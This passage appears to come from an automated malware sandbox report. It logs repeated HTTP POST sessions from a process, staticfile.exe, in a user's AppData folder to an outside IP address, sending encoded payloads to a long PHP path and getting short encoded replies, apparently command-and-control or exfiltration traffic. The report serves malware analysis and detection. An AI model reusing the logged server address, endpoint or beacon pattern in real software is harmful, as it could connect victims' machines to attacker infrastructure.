                  Data Ascii: TT][XGZQTXVSYXXSUR\XQXS[T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'+!(]"W?%,>#:8U>(52 #V>:#?8W)*9[".Z/6
                  Dec 27, 2024 04:03:37.075162888 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:37.318309069 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:36 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.549916185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:37.661319017 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:38.005985975 CET1048OUTData Raw: 54 55 5d 5b 5d 42 5a 5d 54 58 56 53 59 5e 58 51 55 51 5c 5d 51 5a 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TU][]BZ]TXVSY^XQUQ\]QZS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F?Y=<0" &Y=^6?)[&];4#9V-+^!<<T)*9[".Z/.
                  Dec 27, 2024 04:03:39.113725901 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:39.451360941 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:38 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.549921185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:39.684395075 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:40.040610075 CET1048OUTData Raw: 51 57 5d 5b 5d 47 5f 53 54 58 56 53 59 5f 58 54 55 5c 5c 56 51 59 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QW][]G_STXVSY_XTU\\VQYS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$<,1(X 53Z2,"54>(%2\ #".+ "?0T<*9[".Z/*


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.549924185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:40.414591074 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:40.771723986 CET1328OUTData Raw: 51 52 58 5e 5d 45 5f 53 54 58 56 53 59 58 58 5c 55 50 5c 58 51 5a 53 5c 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QRX^]E_STXVSYXX\UP\XQZS\T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+,9>.!! 2?2"9,V)"%;< %:5?,W?:9[".Z/6
                  Dec 27, 2024 04:03:41.778636932 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:42.026290894 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:41 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 27 5b 23 26 3b 0d 3e 12 34 52 24 16 26 54 3c 08 3e 16 38 2d 21 12 29 58 3d 5f 39 06 3b 59 22 3f 31 1e 3e 10 0d 5a 26 36 24 02 23 21 2d 5d 02 1a 23 04 22 1c 07 13 33 20 2b 5d 39 33 00 0a 2a 1d 3e 5e 27 28 2e 52 31 16 33 52 20 1d 3a 08 27 21 31 57 2d 24 2c 06 38 19 01 0c 25 2a 23 5f 03 14 3a 0a 21 00 06 13 31 0f 31 01 34 16 2e 0f 35 1a 21 55 2a 3b 28 02 28 2b 0c 5a 30 32 3b 03 27 13 0c 55 2a 39 0c 10 35 02 33 00 29 09 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '[#&;>4R$&T<>8-!)X=_9;Y"?1>Z&6$#!-]#"3 +]93*>^'(.R13R :'!1W-$,8%*#_:!114.5!U*;((+Z02;'U*953) P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.549926185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:40.602718115 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:40.959187984 CET1048OUTData Raw: 51 50 5d 52 5d 42 5a 5c 54 58 56 53 59 55 58 55 55 56 5c 5f 51 59 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QP]R]BZ\TXVSYUXUUV\_QYSYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A)/><X'!!<%Y=6,P)6&+Z#-;#/,T+*9[".Z/
                  Dec 27, 2024 04:03:41.922373056 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:42.160923004 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:41 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.549930185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:42.406809092 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:42.756036997 CET1048OUTData Raw: 54 56 5d 5c 5d 43 5a 57 54 58 56 53 59 59 58 5d 55 5c 5c 5b 51 5a 53 5f 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TV]\]CZWTXVSYYX]U\\[QZS_T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+Y2<75$%?!#*<=2;;Z4#>-+(#<+(9[".Z/2
                  Dec 27, 2024 04:03:43.781626940 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:44.026067019 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:43 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.549935185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:44.261029959 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:44.615677118 CET1048OUTData Raw: 51 52 5d 5f 5d 49 5a 56 54 58 56 53 59 58 58 51 55 52 5c 5f 51 59 53 5f 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QR]_]IZVTXVSYXXQUR\_QYS_T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$<,.^?><["!;16*(Q="2+?Z4.:4^!/ U?9[".Z/6
                  Dec 27, 2024 04:03:45.639559031 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:45.882273912 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:45 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.549940185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:46.123009920 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:46.474767923 CET1048OUTData Raw: 51 57 5d 5f 58 44 5a 5c 54 58 56 53 59 58 58 50 55 52 5c 57 51 5a 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QW]_XDZ\TXVSYXXPUR\WQZS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$)<"( \"%<>!*8W)+&2+#0-+$"<?:9[".Z/6


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.549943185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:47.157808065 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:47.505908966 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:47.506124020 CET1328OUTData Raw: 54 53 58 5a 58 44 5a 50 54 58 56 53 59 5f 58 54 55 55 5c 5e 51 51 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TSXZXDZPTXVSY_XTUU\^QQSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F+,2]?>$Z5W32.!:;*+:[&4 V-;#<)*9[".Z/*
                  Dec 27, 2024 04:03:48.949809074 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:49.185201883 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:48 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 24 02 20 36 38 1f 2a 2c 23 09 27 2b 2e 12 28 1f 0b 05 2c 2d 3a 03 29 2d 35 1a 2d 2f 34 00 21 3c 07 5a 3d 00 33 13 30 36 24 02 36 21 2d 5d 02 1a 20 1e 21 22 36 0c 27 23 38 05 3a 1d 3a 0a 2a 20 2a 10 27 3b 26 52 32 06 0e 0c 20 0d 14 0e 25 32 03 51 3a 27 27 59 3b 09 02 57 27 10 23 5f 03 14 39 57 21 3d 27 03 24 31 26 1e 22 38 29 56 21 34 08 0f 2a 2b 37 12 3f 28 2e 17 27 32 20 1f 24 3e 2a 1c 3d 39 2e 55 22 2c 28 11 2b 23 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: $ 68*,#'+.(,-:)-5-/4!<Z=306$6!-] !"6'#8::* *';&R2 %2Q:''Y;W'#_9W!='$1&"8)V!4*+7?(.'2 $>*=9.U",(+# P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.549944185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:47.736510038 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:48.084109068 CET1048OUTData Raw: 54 51 58 59 5d 48 5f 57 54 58 56 53 59 5b 58 5c 55 5c 5c 5e 51 51 53 52 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TQXY]H_WTXVSY[X\U\\^QQSRT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A("\>>]5#\%%Z"94T*86X%( &:8"8V<:9[".Z/
                  Dec 27, 2024 04:03:49.085961103 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:49.320936918 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:48 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.549949185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:49.559022903 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:49.912244081 CET1048OUTData Raw: 51 56 5d 58 58 45 5a 5d 54 58 56 53 59 5d 58 55 55 52 5c 5a 51 5e 53 52 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QV]XXEZ]TXVSY]XUUR\ZQ^SRT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+.^(>52?1^#9>=2'] .9+#!?'<9[".Z/"
                  Dec 27, 2024 04:03:51.015722990 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:51.262276888 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:50 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.549954185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:51.499799013 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:51.849951982 CET1048OUTData Raw: 54 54 5d 58 58 47 5f 50 54 58 56 53 59 54 58 52 55 50 5c 59 51 58 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TT]XXG_PTXVSYTXRUP\YQXSYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+/&_>>"1'/"9'=]9&;( %9+<"<T(*9[".Z/
                  Dec 27, 2024 04:03:52.865818024 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:53.110179901 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:52 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.549959185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:53.357357979 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:53.709232092 CET1048OUTData Raw: 54 52 5d 52 58 40 5a 5d 54 58 56 53 59 55 58 50 55 55 5c 5e 51 5b 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TR]RX@Z]TXVSYUXPUU\^Q[S]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'@(?2\>.<#2/Y%"!$)&';'[71T9;4";(:9[".Z/


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.549963185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:54.313970089 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:54.662231922 CET1328OUTData Raw: 54 53 5d 5f 58 44 5f 54 54 58 56 53 59 54 58 52 55 5c 5c 58 51 5b 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TS]_XD_TTXVSYTXRU\\XQ[SZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'+???"8&?*5:#)[%7X#1R,+ ["<8V(*9[".Z/
                  Dec 27, 2024 04:03:55.728466034 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:55.979660034 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:55 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
